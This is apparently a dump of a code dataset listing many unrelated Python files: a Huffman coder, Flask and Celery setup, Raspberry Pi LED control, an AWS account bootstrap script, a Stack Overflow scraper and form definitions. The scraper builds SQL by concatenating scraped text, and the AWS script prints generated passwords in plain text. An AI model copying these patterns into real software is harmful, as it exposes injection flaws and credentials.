text stringlengths 8 6.05M |
|---|
from collections import Counter, namedtuple
from heapq import heapify, heappush, heappop
class Node(namedtuple("Node", ["left", "right"])):
    """Internal node of the Huffman tree holding two subtrees."""

    def walk(self, code, acc):
        """Recursively assign codes: '0' for the left branch, '1' for the right."""
        # BUG FIX: the field was originally misspelled 'rigth'.
        self.left.walk(code, acc + "0")
        self.right.walk(code, acc + "1")


class Leaf(namedtuple("Leaf", ["name"])):
    """Leaf of the Huffman tree holding a single symbol."""

    def walk(self, code, acc):
        # A one-symbol alphabet still needs a non-empty code, hence the "0" fallback.
        code[self.name] = acc or "0"


def huffman_encode(s):
    """Build a Huffman code for string ``s``.

    :param s: input string
    :return: dict mapping each symbol to its bit string; {} for empty input
    """
    # (freq, insertion_index, tree) triples: the index breaks frequency ties
    # so heap comparisons never need to compare the tree objects themselves.
    h = []
    for ch, freq in Counter(s).items():
        h.append((freq, len(h), Leaf(ch)))
    heapify(h)
    # BUG FIX: the original crashed with a ValueError on an empty string
    # when unpacking the (empty) heap below.
    if not h:
        return {}
    count = len(h)
    while len(h) > 1:
        freq1, _count1, left = heappop(h)
        freq2, _count2, right = heappop(h)
        heappush(h, (freq1 + freq2, count, Node(left, right)))
        count += 1
    [(_freq, _count, root)] = h
    code = {}
    root.walk(code, "")
    return code
def decode(s_encoded, code):
    """Decode a Huffman bit string using ``code`` ({symbol: bits}).

    Uses an inverted lookup table so each prefix test is O(1) instead of
    scanning every symbol of the alphabet for every bit.

    :param s_encoded: string of '0'/'1' characters
    :param code: prefix-free mapping from symbol to bit string
    :return: the decoded string
    """
    reverse = {bits: symbol for symbol, bits in code.items()}
    decoded = []
    buf = ""
    for bit in s_encoded:
        buf += bit
        symbol = reverse.get(buf)
        # For a prefix-free code at most one symbol can match the buffer.
        if symbol is not None:
            decoded.append(symbol)
            buf = ""
    return "".join(decoded)
def main():
    """Read one line from stdin, Huffman-encode it, print the code table.

    Output format: first line is "<distinct symbols> <encoded length>",
    then one "symbol: bits" line per symbol, then the encoded bit string.
    """
    s = input()
    code = huffman_encode(s)
    s_encoded = "".join(code[ch] for ch in s)
    print(len(code), len(s_encoded))
    for ch in code:
        print("{}: {}".format(ch, code[ch]))
    print(s_encoded)


if __name__ == "__main__":
    main()
|
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
import os
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker
from sqlalchemy.ext.declarative import declarative_base
from flask_uuid import FlaskUUID
from flask_httpauth import HTTPBasicAuth
# Application-wide singletons shared by the rest of the package.
app = Flask(__name__)
FlaskUUID(app)  # registers a UUID converter for route parameters
auth = HTTPBasicAuth()
app.config.from_object('config')  # settings come from the local config module
config = app.config
db = SQLAlchemy(app)

# Imported at the bottom deliberately: these modules import `app`/`db`
# from this module, so a top-of-file import would be circular.
from models import Users
from app import views, models
|
#!/usr/bin/python3
'''network module'''
import urllib.request
# Fetch the status page and show the raw bytes plus the UTF-8 decoded text.
with urllib.request.urlopen('https://intranet.hbtn.io/status')as response:
    html = response.read()  # body as bytes
    print("Body response:\n\t- type: {}\n\t- content: {}\n\t- utf8 content: {}"
          .format(type(html), html, html.decode()))
|
import RPi.GPIO as GPIO
from time import sleep

# Pins driving the three LEDs, in left-to-right order (BOARD numbering).
ledPins = [11, 13, 15]

GPIO.setmode(GPIO.BOARD)  # Reference pins by numerical position
for pin in ledPins:
    GPIO.setup(pin, GPIO.OUT)  # set pin as output


def chase(pins, on_time=.6, pause=.4):
    """Light each pin in turn for on_time seconds, then pause."""
    for pin in pins:
        GPIO.output(pin, True)
        sleep(on_time)
        GPIO.output(pin, False)
    sleep(pause)


def flash_all(pins, on_time=.6, off_time=.6):
    """Turn every pin on together, wait, then turn them all off and wait again."""
    for pin in pins:
        GPIO.output(pin, True)
    sleep(on_time)
    for pin in pins:
        GPIO.output(pin, False)
    sleep(off_time)


# The original unrolled this pattern by hand for every pin; the loop-based
# helpers above produce the identical on/off/sleep sequence.
i = 1
try:
    while True:
        chase(ledPins)        # sweep left-to-right
        flash_all(ledPins)
        chase(ledPins[::-1])  # sweep right-to-left
        flash_all(ledPins)
        i = i + 1
except KeyboardInterrupt:
    # print() with a single argument behaves identically on python 2 and 3,
    # unlike the original python-2-only print statements.
    print("Cleaning up...\n")
    GPIO.cleanup()  # Clear the state of all pins
    print("All clean :)")
|
# -*- coding: utf-8 -*-
import logging
# Silence noisy third-party loggers: only errors get through.
for _noisy_logger in ("requests", "robobrowser"):
    logging.getLogger(_noisy_logger).setLevel(logging.ERROR)
|
from source import tools
from source.constants import EN1_JSONPATH,ST_VIDEOPATH,SRC_SIZE
from source.states import main_menu,maps,end_stat
from source.component import player,enemys
import json
import pygame.sprite as sprite
'''
偏移 600
max map 7680
'''
def play_video(): 
    """Play the startup video (ST_VIDEOPATH) scaled to SRC_SIZE."""
    tools.play_video(ST_VIDEOPATH, SRC_SIZE)
def main():
    """Wire up the game states, load enemy placements from JSON, run the game."""
    ends = end_stat.End_s()
    game = tools.Game()
    states_0 = main_menu.MainMenu()  # main menu state
    states_1 = maps.MapCon()  # map controller state
    p1 = player.PlayerCO('1')
    # Enemy spawn points are read from the level JSON file.
    file = open(EN1_JSONPATH, 'r', encoding='UTF-8')
    data = json.load(file)
    en1s = sprite.Group()
    for i in data['enemy_01']:
        print(i)
        en1s.add(enemys.Enemys(i["X"], i["Y"], '1'))
    en2s = sprite.Group()
    for i in data['enemy_02']:
        print(i)
        en2s.add(enemys.Enemys(i["X"], i["Y"], '2'))
    en_boos = enemys.Enemys(int(data["boos"][0]["X"]), int(data["boos"][0]["Y"]), "3")  # boss enemy
    file.close()
    en_boom = enemys.Bomb()
    game.run(states_0, states_1, p1, en1s, en2s, en_boos, en_boom, ends)
if __name__ == '__main__':
    # Earlier experiment (kept for reference): optionally play an intro
    # video inside a try/except before starting the game.
    # # try:
    # if callable(play_video()):
    #     play_video()
    main()
    # except:
    #     print("ex")
    # else:
    #     print("==")
|
from ..extenstions import celery
def config_to_celery_kwargs(config):
    """Extract Celery settings from a Flask-style config mapping.

    Keeps only keys starting with 'CELERY', strips any 'CELERY_' prefix
    and lowercases the remainder.
    """
    celery_kwargs = {}
    for key, value in dict(config).items():
        if not key.startswith('CELERY'):
            continue
        celery_kwargs[key.replace('CELERY_', '').lower()] = value
    return celery_kwargs
def create_celery(app):
    """
    Configures the shared celery instance from the application, using its config.

    Every task is wrapped so it runs inside the Flask application context,
    giving tasks access to extensions bound to ``app``.

    :param app: Flask application instance
    :return: Celery instance
    """
    TaskBase = celery.Task

    class ContextTask(TaskBase):
        # Abstract so celery does not register this wrapper itself as a task.
        abstract = True

        def __call__(self, *args, **kwargs):
            with app.app_context():
                return TaskBase.__call__(self, *args, **kwargs)

    celery_config = config_to_celery_kwargs(app.config)
    print('Celery config: ', celery_config)
    celery.conf.update(**celery_config)
    print('Celery broker: ' + str(celery.conf.get('broker_url')))
    celery.Task = ContextTask
    return celery
|
#!/usr/bin/env python
import os
import sys
class Drone(object):
def __init__(self):
print "Starting account creation and buildup"
self.step = 0
from misc import Misc
from core.base import base
base = base()
if Misc.confirm(prompt="Are you sure you want to create an account infrastructure?", resp=False):
self.account = base.get_account_information()
if 'profile_name' in self.account['cli_arguments']:
print "Aws account has been provided"
else:
logger.error("Aws account not provided")
exit(1)
if 'region_name' in self.account['cli_arguments']:
print "Aws region has been provided"
else:
logger.error("Aws region not provided")
exit(1)
if 'session' in self.account and self.account['session'] is not (None or ""):
logger.info("Session object created succesfully")
else:
logger.error("Aws Session not created successfuly")
exit(1)
self.run_workflow()
else:
print "You are not prepared - Illidian"
def increment_step(self):
    """Advance the workflow step counter and return its new value."""
    self.step = self.step + 1
    return self.step
def run_workflow(self):
    """Interactive, step-by-step AWS account bring-up.

    Walks the operator through key creation, cloudformation bucket/stack
    setup and devops IAM user provisioning, confirming each step on the
    console before continuing.
    """
    from misc import Misc
    from core.awsrequests import awsrequests
    AWSreq = awsrequests(session=self.account['session'])
    region = self.account['cli_arguments']['region_name']
    print ""
    print "Step %s: Creating ec2 keys" % (self.increment_step(),)
    if not Misc.confirm("Has the keys for all envs been created with syntax default-env syntax?", resp=True):
        exit(1)
    print ""
    print "Step %s: Creating bucket for cloudformation" % (self.increment_step(),)
    if Misc.confirm("Should we create the s3 bucket for cloudformation?", resp=True):
        bucket_name = raw_input("What should the bucket name be (ex: xively-devops-templates-dr ): ")
        AWSreq.create_s3_bucket(name=bucket_name, location=region)
    else:
        print "Assuming bucket is already created"
        bucket_name = raw_input("What is the bucket name?")
    print ""
    print "Step %s: Upload xively_cloudformation repo to the s3 bucket" % (self.increment_step(),)
    while not Misc.confirm("Is the upload finished?", resp=False):
        print "Finish upload before continue"
    print ""
    print "Step %s: Run cloudformation template for infrastructure?" % (self.increment_step(),)
    if Misc.confirm("Should we run the cloudformation template", resp=False):
        # FIXME test if works
        # NOTE(review): this calls the awsrequests *class*, not the AWSreq
        # instance created above — confirm this is callable this way.
        cloudformation_template_name = raw_input(
            "What is the name of template to run (ex. VPC_dr_account.template ): ")
        url = "https://s3.amazonaws.com/" + bucket_name + "/" + cloudformation_template_name
        awsrequests.create_cloudformation_stack(stackname="vpc-infrastructure", templateurl=url)
    else:
        print "Assuming the stack has already been run."
    print ""
    print "Step %s: Run cloudformation template for users base" % (self.increment_step(),)
    if Misc.confirm("Should we run the cloudformation template?", resp=False):
        # FIXME test if works
        # NOTE(review): same class-vs-instance concern as above.
        cloudformation_template_name = raw_input(
            "What is the name of template to run (ex. prod_account_iam.template ): ")
        url = "https://s3.amazonaws.com/" + bucket_name + "/" + cloudformation_template_name
        awsrequests.create_cloudformation_stack(stackname="devops-users", templateurl=url)
    else:
        print "Assuming the stack has already been run."
    devops_groupname = raw_input("Name of the generated devops group? ")
    print ""
    print "Step %s: Start amon.py to deploy to environement" % (self.increment_step(),)
    while not Misc.confirm("Is the packer generation started", resp=False):
        print "Start before we continue"
    print ""
    print "Step %s: Creating devops users" % (self.increment_step(),)
    devops_yaml = Misc.get_yaml(yamlfile="devops_users.yaml")
    for user in devops_yaml['users']:
        print "Checking user %s" % (user,)
        create_password = True
        if not AWSreq.iam_user_exists(username=user):
            print "Creating user %s" % (user,)
            AWSreq.create_iam_user(username=user, dryrun=False, path="/")
        else:
            # Existing users keep their password if they already have a
            # console login profile.
            login_profile = AWSreq.get_login_profile(username=user)
            if login_profile is not None:
                create_password = False
        if create_password:
            user_password = Misc.generate_password(size=10)
            AWSreq.create_iam_login_profile(username=user, password=user_password)
            print "Username: %s generated password is: %s" % (user, user_password)
        user_groups = AWSreq.iam_user_groups(username=user)
        if devops_groupname not in user_groups[user]:
            print "Need to add to group"
            AWSreq.add_iam_user_to_group(username=user, groupname=devops_groupname)
if __name__ == '__main__':
    # Make the project's lib directories importable before pulling in
    # misc.Logger, then start the interactive workflow.
    root_dir = os.path.dirname(os.path.dirname(os.path.realpath(sys.argv[0])))
    os.environ['KERRIGAN_ROOT'] = root_dir
    kerrigan_lib_dir = "%s/lib" % (root_dir,)
    sys.path.append(kerrigan_lib_dir)
    kerrigan_lib_dir = "%s/lib-char" % (root_dir,)
    sys.path.append(kerrigan_lib_dir)
    from misc.Logger import logger
    logger.debug('Starting Drone')
    Drone()
|
"""Metafeatures build for the Gridworld environment."""
import typing as t
import warnings
import numpy as np
import scipy.stats
import test_envs.gridworld
def ft_goal_dist_euclid(env):
    """Euclidean (L2) distances between the start cell and the goals.

    NOTE(review): the norm is taken over axis=0; if ``env.goals`` is an
    (n_goals, 2) array this aggregates per coordinate, not per goal
    (axis=1) — confirm the intended shape.
    """
    start_pos = np.asarray(list(env.start), dtype=float)
    goal_pos = np.asarray(list(env.goals), dtype=float)
    return np.linalg.norm(goal_pos - start_pos, ord=2, axis=0)
def ft_goal_dist_manh(env):
    """Manhattan (L1) distances between the start cell and the goals.

    NOTE(review): axis=0 aggregates per coordinate for an (n_goals, 2)
    array — confirm axis=1 was not intended.
    """
    start_pos = np.asarray(list(env.start), dtype=float)
    goal_pos = np.asarray(list(env.goals), dtype=float)
    return np.linalg.norm(goal_pos - start_pos, ord=1, axis=0)
def ft_trap_dist_euclid(env):
    """Euclidean (L2) distances between the start cell and the traps.

    NOTE(review): same axis=0 concern as the goal-distance features.
    """
    start_pos = np.asarray(list(env.start), dtype=float)
    trap_pos = np.asarray(list(env.traps), dtype=float)
    return np.linalg.norm(trap_pos - start_pos, ord=2, axis=0)
def ft_trap_dist_manh(env):
    """Manhattan (L1) distances between the start cell and the traps.

    NOTE(review): same axis=0 concern as the goal-distance features.
    """
    start_pos = np.asarray(list(env.start), dtype=float)
    trap_pos = np.asarray(list(env.traps), dtype=float)
    return np.linalg.norm(trap_pos - start_pos, ord=1, axis=0)
def _in_radius_vals(env, values: np.ndarray, radius_prop: float):
assert 0 < radius_prop <= 1
width = env.width
height = env.height
radius = radius_prop * 0.5 * (width + height)
return values[values <= radius]
def ft_goal_radial_dist(env, radius_prop: float = 0.5):
    """Euclidean goal distances that fall within the radial cutoff."""
    return _in_radius_vals(
        env, values=ft_goal_dist_euclid(env), radius_prop=radius_prop
    )
def ft_trap_radial_dist(env, radius_prop: float = 0.5):
    """Euclidean trap distances that fall within the radial cutoff."""
    return _in_radius_vals(
        env, values=ft_trap_dist_euclid(env), radius_prop=radius_prop
    )
def ft_wall_patch_prop(env, patch_prop: float = 0.2):
    """Proportion of wall cells in a map patch centred on the start cell.

    The patch spans ``patch_prop`` of the map extent in each direction and
    is clamped to the map bounds.
    """
    start_y, start_x = np.asarray(list(env.start), dtype=int)
    half_w = 0.5 * patch_prop * env.width
    half_h = 0.5 * patch_prop * env.height
    # Slicing is end-exclusive, hence the +1 on the upper bounds.
    y_lo = max(0, start_y - int(half_h))
    y_hi = min(env.height - 1, start_y + int(np.ceil(half_h))) + 1
    x_lo = max(0, start_x - int(half_w))
    x_hi = min(env.width - 1, start_x + int(np.ceil(half_w))) + 1
    patch = env.map[y_lo:y_hi, :][:, x_lo:x_hi]
    return np.mean(patch == test_envs.gridworld.CellCode.WALL)
# Statistics used to collapse a vector-valued metafeature into scalars.
summary_functions = {
    "mean": np.mean,
    "std": np.std,
    "max": np.max,
    "min": np.min,
    "median": np.median,
    "kurtosis": scipy.stats.kurtosis,
    "skewness": scipy.stats.skew,
    "sum": np.sum,
    "len": len,
}


def summarize(
    feature: str, values: t.Union[float, np.ndarray]
) -> t.Tuple[t.List[str], t.List[float]]:
    """Summarize one metafeature into parallel (names, values) lists.

    Scalars pass through unchanged (minus any 'ft_' prefix); vectors are
    reduced with every function in ``summary_functions``, recording NaN
    for summaries that raise ValueError.
    """
    name = feature[3:] if feature.startswith("ft_") else feature
    if np.isscalar(values):
        return [name], [values]
    names = []  # type: t.List[str]
    vals = []  # type: t.List[float]
    for summ_name, summ_func in summary_functions.items():
        try:
            with warnings.catch_warnings():
                warnings.simplefilter("ignore")
                vals.append(summ_func(values))
        except ValueError:
            vals.append(np.nan)
        names.append(f"{name}.{summ_name}")
    return names, vals
def _test():
    """Smoke test: print summaries for a scalar and two vector features."""
    ft = ["ab", "ft_cd", "ft_ef"]
    vals = [[1.0, 2.0], [-7, 7], 0]
    for ft_name, ft_vals in zip(ft, vals):
        print(summarize(ft_name, ft_vals))


if __name__ == "__main__":
    _test()
|
def juros_compostos():
    """Read an initial capital and monthly rate, compound for 12 months.

    Returns [annual growth factor, growth factor / monthly rate].
    NOTE(review): 'taxa_anual' is the ratio final/initial capital (a
    growth factor, not a rate), and dividing it by the monthly rate is of
    unclear meaning — confirm this is the intended computation.
    """
    lista = list()
    x = int(input("Digite o Capital Inicial a ser investido: "))
    taxa_mensal = float(input("Digite a Taxa Mensal de Juros: "))
    Montante_posterior = x
    n = 1
    while n <= 12:  # compound month by month for one year
        Montante_posterior = Montante_posterior + Montante_posterior * taxa_mensal
        n = n + 1
    taxa_anual = Montante_posterior / x
    variação_taxas = taxa_anual / taxa_mensal
    lista.append(taxa_anual)
    lista.append(variação_taxas)
    return (lista)
def calculo_taxa_mensal():
    """Derive a monthly figure from juros_compostos() output.

    NOTE(review): the computed value is neither returned nor printed, so
    this function currently has no observable result.
    """
    a = juros_compostos()
    taxa_mensal = a[0] / a[1]


# Runs at import time and prompts the user via input().
calculo_taxa_mensal()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Dec 4 14:49:27 2020
@author: nerohmot
"""
import struct
from . import command_ABC
class SET_RAIL_STATUS(command_ABC):
    '''
    Description: set the desired status (on/off) of all rails.

    Input: the desired status of the rails.
    Output: the new (current) status of the rails, in the same layout.

    | Index | Name        | Type    | Description                        |
    |:-----:|:------------|:--------|:-----------------------------------|
    |0      | RAIL1_STAT  | uint8   | RAIL1 status (0=off, 1=on)         |
    |1      | RAIL2_STAT  | uint8   | RAIL2 status (0=off, 1=on)         |
    |2      | P25V0D_STAT | uint8   | P25V0D status (0=off, 1=on)        |
    |3      | P17V0D_STAT | uint8   | P17V0D status (0=off, 1=on)        |
    |4      | N7V0D_STAT  | uint8   | N7V0D status (0=off, 1=on)         |
    |5      | P15V0A_STAT | uint8   | P15V0A status (0=off, 1=on)        |
    |6      | N15V0A_STAT | uint8   | N15V0A status (0=off, 1=on)        |
    |7      | P5V0D_STAT  | uint8   | P5V0D status (0=off, 1=on)         |
    |8      | P5V0A_STAT  | uint8   | P5V0A status (0=off, 1=on)         |
    |9      | N5V0A_STAT  | uint8   | N5V0A status (0=off, 1=on)         |
    |10     | P3V3D_STAT  | uint8   | P3V3D status (0=off, 1=on)         |
    |11     | PVLB_STAT   | uint8   | PVLB status (0=off, 1=on)          |
    |12     | P5V0R_STAT  | uint8   | P5V0R status (0=off, 1=on)         |
    '''
    # Protocol identifiers for this command/sub-command pair.
    command = 0x03
    sub_command = 0x07
    # Default payload: 13 unsigned bytes, one per rail in table order,
    # all switched on.
    default_send_payload = struct.pack('BBBBBBBBBBBBB',
                                       1,  # RAIL1 on
                                       1,  # RAIL2 on
                                       1,  # P25V0D on
                                       1,  # P17V0D on
                                       1,  # N7V0D on
                                       1,  # P15V0A on
                                       1,  # N15V0A on
                                       1,  # P5V0D on
                                       1,  # P5V0A on
                                       1,  # N5V0A on
                                       1,  # P3V3D on
                                       1,  # PVLB on
                                       1)  # P5V0R on

    def receive(self, DA, ACK, RXTX, PAYLOAD):
        """Log a received frame to the parent widget's output pane."""
        line = f"DA={DA} CMD={self.command} SCMD={self.sub_command} ACK={ACK} RXTX={RXTX} PAYLOAD={PAYLOAD}"
        self.parent.output_te.append(line)
|
from lxml import html
import requests
import sqlite3
from time import sleep
base_url = 'http://stackoverflow.com'
conn = sqlite3.connect('morpheus11.db')
conn2 = sqlite3.connect('morpheus11.db')
keywords = ['cbind', 'rbind', 'filter', 'gather', 'group_by', 'inner_join', 'mutate', 'select', 'separate', 'spread', 'summarise', 'unite']
c = conn.cursor()
c2 = conn2.cursor()
# Create table
c.execute('''CREATE TABLE post_tb
(myurl text, offset text, vote text, code text)''')
cnt = 1
urls = []
for row in c.execute('SELECT url FROM topic_tb'):
myurl = base_url + row[0]
urls.append(myurl)
conn.close()
for myurl in urls:
try:
print 'Request------------------', 'index:', cnt, myurl
cnt = cnt + 1
page = requests.get(myurl)
tree = html.fromstring(page.content)
accept_ans = tree.xpath('//*[@class="answer accepted-answer"]')
other_ans = tree.xpath('//*[@class="answer"]')
if len(accept_ans) > 0:
accept_code_list = accept_ans[0].xpath('table/tr[1]/td[2]/div/pre/code/text()')
acp_vote = '-2'
acp_vote_list = accept_ans[0].xpath('table/tr[1]/td[1]/div/span[1]/text()')
if len(acp_vote_list) > 0:
acp_vote = acp_vote_list[0]
acpt_code = "#morpheus#".join(accept_code_list)
flag = False
for key in keywords:
if key in acpt_code:
flag = True
break
if len(accept_code_list) > 0 and flag:
#print 'acpt:', acpt_code, 'vote:', acp_vote
acpt_code = acpt_code.replace("\"", "")
sql = "INSERT INTO post_tb VALUES (\"" + myurl + "\",\""+ str(1) +"\",\""+ acp_vote +"\",\""+ acpt_code + "\")"
#print sql
c2.execute(sql)
num = 2
for other in other_ans:
other_code = other.xpath('table/tr[1]/td[2]/div/pre/code/text()')
if len(other_code) == 0:
continue
other_vote_list = other.xpath('table/tr[1]/td[1]/div/span[1]/text()')
other_vote = '-2'
if len(other_vote_list) > 0:
other_vote = other_vote_list[0]
#print '------------------------------------'
others = "#morpheus#".join(other_code)
flag = False
for key in keywords:
if key in others:
flag = True
break
if not flag:
continue
#print 'other:', others, 'vote:', other_vote
others = others.replace("\"", "")
sql = "INSERT INTO post_tb VALUES (\"" + myurl + "\",\""+ str(num) +"\",\""+ other_vote +"\",\""+ others + "\")"
#print sql
c2.execute(sql)
num = num +1
conn2.commit()
sleep(5)
except Exception as inst:
print "Exception!", inst
conn2.close()
#page = 'http://stackoverflow.com/questions/29679381/tidyr-wide-to-long'
#page = 'http://stackoverflow.com/questions/29775461/tidyr-repeated-measures-multiple-variables-wide-format'
|
# Ideal-weight calculator: reads a height and applies the linear formula
# 72.7 * height - 58 (presumably height in metres — confirm units).
print('Calcula o peso ideal')
altura = float(input('Informe sua altura: '))
peso_ideal = (72.7 * altura) - 58
print('Seu peso ideal é {:.2f} kg'.format(peso_ideal))
|
# Travel-time estimator: time [h] = distance [km] / average speed [km/h].
distancia = float(input('Qual a distância em km: '))
velocidade = float(input('Qual a velocidade média em km/h: '))
tempo = distancia / velocidade  # NOTE: zero speed raises ZeroDivisionError
print(f'O tempo de viagem será de: {tempo:.1f} horas ')
|
import sys
import json
import struct
import logging
from config import DAEMON_VERSION, ACTIONS
class Messenger:
    """
    Handles the sending and receiving of messages to and from the addon using stdio.

    Messages are JSON documents preceded by a native-endian uint32 length
    prefix (the WebExtension native-messaging framing).

    :param version str: the current major python version
    """

    def __init__(self, version):
        self.stdout, self.stdin = self.get_stdio_handle(version)

    def get_stdio_handle(self, python_version):
        """
        Return (stdout, stdin) handles for the given major python version.

        Python 2 uses the raw ``sys.std*`` streams; python 3 needs the
        binary ``.buffer`` wrappers.

        :return: (stdout handle, stdin handle)
        :rType: tuple
        """
        if python_version != 2:
            return (sys.stdout.buffer, sys.stdin.buffer)
        return (sys.stdout, sys.stdin)

    def decode_message(self, encoded_length):
        """
        Read and JSON-decode one message from stdin.

        :param encoded_length buffer: 4-byte buffer holding the data length
        :return: the decoded message
        :rType: object
        """
        (data_length,) = struct.unpack('@I', encoded_length)
        raw = self.stdin.read(data_length)
        return json.loads(raw.decode('utf-8'))

    def encode_message(self, message):
        """
        Encode a message for stdout.

        :param message object: the message to encode
        :return: (length prefix, utf-8 encoded JSON payload)
        :rType: tuple
        """
        payload = json.dumps(message).encode('utf-8')
        return (struct.pack('@I', len(payload)), payload)

    def get_message(self):
        """
        Block until a complete message arrives on stdin; return it decoded.

        Exits the process cleanly when stdin is closed (addon shut down).
        """
        prefix = self.stdin.read(4)
        if not prefix:
            logging.error('Failed to read data from stdin')
            sys.exit(0)
        return self.decode_message(prefix)

    def send_message(self, message_object):
        """
        Length-prefix, encode and flush a message to stdout.

        :param message [Message|ErrorMessage]: the message to encode and send
        """
        length, encoded = self.encode_message(message_object.getMessage())
        self.stdout.write(length)
        self.stdout.write(encoded)
        self.stdout.flush()
|
/Users/daniel/anaconda/lib/python3.6/random.py |
from django.db import models
from authtools.models import AbstractNamedUser
from localflavor.us.models import PhoneNumberField
class User(AbstractNamedUser):
    """Custom user with a phone number, stored in the legacy auth_user table."""
    phone = PhoneNumberField()

    def username(self):
        # BUG FIX: the original was defined without ``self`` and referenced
        # ``self.email`` anyway, so calling it raised an error.
        return self.email

    class Meta:
        db_table = 'auth_user'
        permissions = (
            ('manager_promotions', 'Manage promotions'),
        )

    def __unicode__(self):
        # Python-2 Django string representation.
        return self.name
|
# -*- coding: utf-8 -*-
class Solution:
    def getMaximumGenerated(self, n: int) -> int:
        """Return the maximum value of the 'generated array' of size n + 1.

        nums[0] = 0, nums[1] = 1, nums[2i] = nums[i],
        nums[2i + 1] = nums[i] + nums[i + 1].
        """
        nums = [0] * (n + 1)
        best = 0
        for idx in range(1, n + 1):
            half = idx // 2
            if idx == 1:
                nums[idx] = 1
            elif idx % 2 == 0:
                nums[idx] = nums[half]
            else:
                nums[idx] = nums[half] + nums[half + 1]
            best = max(best, nums[idx])
        return best
if __name__ == "__main__":
    # Quick self-checks against known examples.
    solution = Solution()
    assert 3 == solution.getMaximumGenerated(7)
    assert 1 == solution.getMaximumGenerated(2)
    assert 2 == solution.getMaximumGenerated(3)
|
"""
compile & install FlyCap2 for windows and linux.
Directory should appear something like:
PyCapture2
|-doc
| |-FlyCap2 documentation.chm
| +-FlyCap2 documentation.pdf
|
|-src
| |-python2
| | +-PyCapture2.c
| |
| |-python3
| | +-PyCapture2.c
|
|-examples
| |-python2
| | + <python 2 examples>
| +-python3
| |    + <python 3 examples>
|
|-setup.py
|-README.txt
|-README_Linux.txt
|-README_MacOS.txt
"""
import os
import platform
import numpy as np
try:
from setuptools import setup
from setuptools.extension import Extension
except ImportError:
from distutils import setup
from distutils.extension import Extension
import struct
import sys
def getReadme():
    """Return the contents of the platform-appropriate README file."""
    if os.name == 'posix':
        readme_name = "README_MacOS.txt" if platform.system() == 'Darwin' else "README_Linux.txt"
    else:
        readme_name = "README.txt"
    filedata = open(readme_name)
    desc = filedata.read()
    filedata.close()
    return desc
os.chdir(sys.path[0])  # Change working directory to the script's directory

# if operating system is linux/macOS:
if os.name == 'posix':
    # BUG FIX: the original used Windows-style backslash paths in this
    # branch (r'..\..\lib'), which do not resolve on posix systems.
    libDir = os.path.abspath('../../lib')
    incDir = os.path.abspath('../../include/C')
    libName = 'flycapture-c'
    libVideoName = 'flycapturevideo-c'
# if operating system is windows:
else:
    # winreg has different names in python 2 & 3
    if sys.version_info[0] < 3:
        import _winreg as winreg
    else:
        import winreg
    # check if 32 or 64bit python - installed flycapture 2 must match!
    if struct.calcsize("P") == 8:  # 64bit
        libDir = os.path.abspath(r'..\..\lib64\C')
    else:  # not 64bit - 32bit
        libDir = os.path.abspath(r'..\..\lib\C')
    incDir = os.path.abspath(r'..\..\include\C')
    libName = 'FlyCapture2_C'
    libVideoName = 'FlyCapture2Video_C'

# python 2 and python 3 are different - each must be cythonized differently.
if sys.version_info[0] < 3:
    srcDir = os.path.normcase(r'src/python2/')
else:
    srcDir = os.path.normcase(r'src/python3/')

# put include path, library, etc into the extension
extensions = [
    Extension('PyCapture2', [srcDir + r'PyCapture2.c'],
              include_dirs=[incDir, np.get_include()],
              library_dirs=[libDir],
              libraries=[libName, libVideoName]
              )
]

# specify docs, create list of all additional files to add.
eventsTable = ('', ['pgr_events_table.dat'])
dataFiles = [eventsTable]

# get version from the optional '--setVer <version>' command line argument
if '--setVer' in sys.argv:
    verInd = sys.argv.index('--setVer')
    sys.argv.remove('--setVer')
    # after removal, verInd now points at the value that followed the flag
    ver = sys.argv[verInd]
    sys.argv.remove(ver)
else:
    ver = ''

setup(
    name="PyCapture2",
    version=ver,
    author="FLIR Integrated Imaging Solutions, Inc",
    description="A python wrapper for the FlyCapture 2 library.",
    url="https://www.ptgrey.com/",
    long_description=getReadme(),
    data_files=dataFiles,
    ext_modules=extensions
)
|
from wtforms import Form
from wtforms import StringField, PasswordField, BooleanField, TextAreaField
from wtforms.fields.html5 import EmailField
from wtforms import validators
from .models import User
def user_validator(form, field):
    """Reject the reserved username 'adsi' (either capitalization)."""
    if field.data in ('adsi', 'Adsi'):
        raise validators.ValidationError('El username adsi no es permitido')
class LoginForm(Form):
    """Login form: username (4-50 chars) and a required password."""
    username = StringField('Username', [
        validators.length(min=4, max=50, message='El nombre de usuario debe encontrarse entre 4 y 50 caracteres de largo..')
    ])
    password = PasswordField('Password', [
        validators.Required(message='El password es requerido')
    ])
class RegisterForm(Form):
    """Sign-up form with uniqueness checks for username and email."""
    username = StringField('Username', [
        validators.length(min=4, max=50),
        user_validator  # rejects the reserved 'adsi' username
    ])
    email = EmailField('Correo electronico', [
        validators.length(min=6, max=100),
        validators.Required(message='El email es requerido'),
        validators.Email(message='Ingrese un email valido')
    ])
    mobile = StringField('Mobile', [
        validators.length(min=5, max=100)
    ])
    user_photo = StringField('Photo', [
        validators.length(min=5, max=225)
    ])
    password = PasswordField('Password', [
        validators.Required('La contraseña es requerida.'),
        validators.EqualTo('confirm_password', message='La contraseña no coinside')
    ])
    confirm_password = PasswordField('Confirmar Contraseña')
    accept = BooleanField('Acepto terminos y condiciones', [
        validators.DataRequired()
    ])

    # WTForms calls validate_<fieldname> hooks automatically during validate().
    def validate_username(self, username):
        if User.get_by_username(username.data):
            raise validators.ValidationError('El usuario ya se encuentra registrado.')

    def validate_email(self, email):
        if User.get_by_email(email.data):
            raise validators.ValidationError('El email ya se encuentra registrado.')

    # Earlier whole-form validation kept for reference (see views line 38):
    # def validate(self):
    #     if not Form.validate(self):
    #         return False
    #     if len(self.password.data) < 3:
    #         self.password.errors.append('La contraseña es muy corta')
    #         return False
    #     return True
class TaskForm(Form):
    """Form for publishing an article/item."""
    article_photo = StringField('Article Photo', [
        validators.DataRequired(message='The photo of the item is required')
    ])
    # FIX: label typo 'Naeme article' -> 'Name article'
    name_article = StringField('Name article', [
        validators.length(min=4, max=50, message='Name out of range'),
        validators.DataRequired(message='Name is required')
    ])
    article_description = TextAreaField('Description', [
        validators.DataRequired(message='Description is required.')
    ], render_kw={'rows': 5})
    # FIX: label typo 'Article Adress' -> 'Article Address'
    article_address = StringField('Article Address', [
        validators.DataRequired(message='The address where the item is located is required')
    ])
    article_expires = StringField('Article Expires', [
        validators.DataRequired(message='The expiration date of the item is required')
    ])
|
from PIL import Image
import serial
import time
import winsound

# Receive 184x120 grayscale frames over bluetooth serial and save them as
